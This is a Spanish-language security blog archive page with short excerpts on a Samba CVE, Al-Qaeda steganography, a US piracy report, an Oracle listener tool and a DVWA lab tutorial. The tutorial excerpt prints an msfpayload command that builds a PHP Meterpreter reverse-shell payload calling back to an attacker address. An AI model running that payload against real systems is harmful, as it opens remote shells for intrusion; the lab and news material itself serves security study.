Vulnerabilidad en Samba permite elevar privilegios

Posted on 3 May 2012 by admin

Si hace dos semanas informábamos de una grave vulnerabilidad remota que afectaría a multitud de dispositivos (CVE-2012-1182), el equipo de Samba acaba de descubrir otro grave fallo (CVE-2012-2111) que afectaría a los usuarios de las versiones 3.4.x hasta la 3.6.4 inclusive. Descubierta por el investigador italiano Ivano Cristofolini, esta vulnerabilidad permitiría que un atacante remoto autenticado pudiera elevar privilegios (en concreto el “take ownership”) a través de conexiones al LSA..

View post:
Vulnerabilidad en Samba permite elevar privilegios

Al-Qaeda usa videos pornográficos y esteganografía para ocultar documentos

Posted on 3 May 2012 by admin

Esta historia se basa en documentos internos Al-Qaeda, cuyos detalles fueron obtenidos por la cadena CNN.

Originally posted here:
Al-Qaeda usa videos pornográficos y esteganografía para ocultar documentos

Argentina, Chile y Venezuela en la lista negra de piratería de EE.UU.

Posted on 1 May 2012 by admin

En el informe anual que realiza el gobierno norteamericano, el país fue incluido entre los que tienen “alta prioridad” por violación de patentes, marcas y derechos de propiedad. El Departamento de Comercio de Estados Unidos incluyó a la Argentina en una virtual “lista negra” de países que no respetan o violan el derecho de propiedad, las patentes y marcas, especialmente en internet. Se trata del reporte anual Special 301 [PDF].

See the original article here:
Argentina, Chile y Venezuela en la lista negra de piratería de EE.UU.

Obtener una sesión meterpreter explotando SQL Injection

Posted on 30 April 2012 by admin

Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA. 1. Creamos el payload: msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php 2

See the original post:
Obtener una sesión meterpreter explotando SQL Injection

Integrigy para evaluar el puerto 1521 (Listener Oracle)

Posted on 27 April 2012 by admin

Buenas a todos, nombrar el puerto 1521 ya causa a muchos administradores sudores y sufrimiento, es uno de esos puertos fatídicos que se suelen quedar ahí, por defecto, sin bastionar el servicio que hay detrás, esperando a que llegue alguien para encontrar un regalo. Para los que no estén familiarizados con este puerto, se trata del lugar donde opera el receptor de escucha de base de datos de Oracle

See the article here:
Integrigy para evaluar el puerto 1521 (Listener Oracle)

Shadow Security

Tag Archives: concientización